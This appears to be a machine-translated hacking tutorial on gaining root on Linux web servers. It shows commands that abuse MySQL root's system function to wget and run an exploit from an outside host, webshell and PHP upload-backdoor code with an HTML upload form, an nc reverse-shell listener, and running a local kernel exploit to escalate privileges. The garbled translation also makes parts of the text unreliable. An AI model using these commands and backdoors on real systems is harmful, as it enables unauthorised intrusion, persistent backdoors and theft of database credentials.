The method of using MySQL root to extract power
The MySQL 5.x introduces a system function that executes commands that can be executed by using this function when MySQL is logged in as root, which is, of course, within the purview of the permission.
Generally we follow the usual idea, get to MySQL root password, we will connect up, create a table, and then outfile, get a Webshell, and then mention the right so. Today we'll put it another way.
According to the above method, we need to know the absolute path of the web, of course, this is not easy to find, some have sqlinjection, may be the error will be displayed, and some not necessarily. But according to my method, there is no need to go to the Web path, directly execute
Mysql>system vi/etc/httpd/conf/httpd.conf;
Just so you can find the path to the Web, of course, our goal is not to find a Web path, put Webshell in. We're going to do other things like, download exp execution, get root permission, and then install the back door
Mysql>system wget http://www.xxx.com/xxxx;
Mysql>system chmod +x xxxx; Mysql>system./xxxx;
This is the root of the MySQL system root at this time, the rest of the matter, if opened SSH, on SSH connection, enter the user password MySQL, OK, fix.
Linux low privilege claim
Rally try TMP to create a good file, SHELL Directory of Horse, execute, local NC monitor online, WhoAmI, is wwwroot permissions
Can CD to the root directory superior (/var/www/virtual/), and then LS, the overall site is out, the target station did not blind the folder name, but no permission to jump in
Try tar packing, no permissions, try to pack the target station directory files separately, but the root directory conn.config is limited to the current target station readable permissions.
Try the CP target station include directory, unexpectedly can copy over, but cannot write copy not past, found the database configuration information, and then another server.
The database is backed up with a Phpspyshell first:
Check to see some configuration information and account number, but no background path and other sensitive information
The scan tool does not sweep the destination Web folder, and is estimated to have been modified
Try to mention the right Cmdshell as user or root, not directly to see Apache configuration settings, try to wget a few exp, but useless, estimated to have been patched
CP May, but does not know the specific information
Since the web does not have permissions, try MySQL to see if there is a privilege bar
CREATE TABLE Hackdn (spider BLOB); Creating table Hackdn
Then back up to the target path 1.php file. Found not connected.
CP came to see, was separated by the translation character,
If you do not add ', insert
<?copy ($_files[myfile][tmp_name],$_files[myfile][name]);? >
After backing up to PHP, save the following code locally as
| The code is as follows |
Copy Code |
|
1.HTML
<form enctype= "Multipart/form-data" action= "http://www.webshell.cc/mysql_bak/1.php" method= "POST" >
<input name= "MyFile" type= "File" >
<input value= "submitted" type= "Submit" >
</form>
|
Simple Linux power of reference
Get the shell, ready to claim. First look at the Linux kernel
uname-a
2.6.18-194.11.3.el5 Kernel 2010, this Okay, CentOS release 5.5.
Then Baidu or other path to find exp,2.6.18-194 This kernel I have already collected. Upload/tmp, why do you want to upload to this directory?
because the TMP directory can be written to execute normally, continue ing.
to find an extranet IP listener 12666, of course, 12666 can also be changed. I'm here to use the NC monitor nc-l-n-v-P 12666
Then point your shell
Connection success appears below
Then we go into the/tmp directory
cd/tmp into the TMP directory, look at our previous uploaded 2.6.18-194
I have permission to rwx, readable and writable to Execution. If you do not have permission to chmod-r the 777 filename
My exp Here has been compiled, the direct execution overflow is OK ./2.6.18-194 if your exp did not compile gcc-o/tmp/filename/tm p/file name. C, you can compile it yourself
succeeded ... In fact, Linux right is still very simple, the key to see if there is no exp... finished !!!!!
